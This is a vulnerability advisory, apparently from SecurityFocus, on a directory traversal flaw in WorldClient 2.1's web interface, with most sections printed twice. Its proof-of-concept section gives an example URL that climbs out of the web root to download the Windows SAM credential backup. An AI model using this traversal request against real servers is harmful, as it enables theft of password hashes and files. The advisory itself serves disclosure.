Deerfield WorldClient 2.1 Directory Traversal Vulnerability
BID:1462
Info
Deerfield WorldClient 2.1 Directory Traversal Vulnerability
| Bugtraq ID: | 1462 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jul 12 2000 12:00AM |
| Updated: | Jul 12 2000 12:00AM |
| Credit: | Discovered by and posted to Bugtraq on July 12, 2000 by Rikard Carlsson <[email protected]>. |
| Vulnerable: |
Altn WorldClient Standard 2.1 |
| Not Vulnerable: | |
Discussion
Deerfield WorldClient 2.1 Directory Traversal Vulnerability
The HTTP interface for WorldClient 2.1 is vulnerable to a directory traversal. By requesting a URL composed of the filename and ..\ it is possible for a remote user to retrieve and dowload any file of known location.
The HTTP interface for WorldClient 2.1 is vulnerable to a directory traversal. By requesting a URL composed of the filename and ..\ it is possible for a remote user to retrieve and dowload any file of known location.
Exploit / POC
Deerfield WorldClient 2.1 Directory Traversal Vulnerability
Example:
http://email.victim.com/..\..\..\winnt\repair\sam._
Example:
http://email.victim.com/..\..\..\winnt\repair\sam._
Solution / Fix
Deerfield WorldClient 2.1 Directory Traversal Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].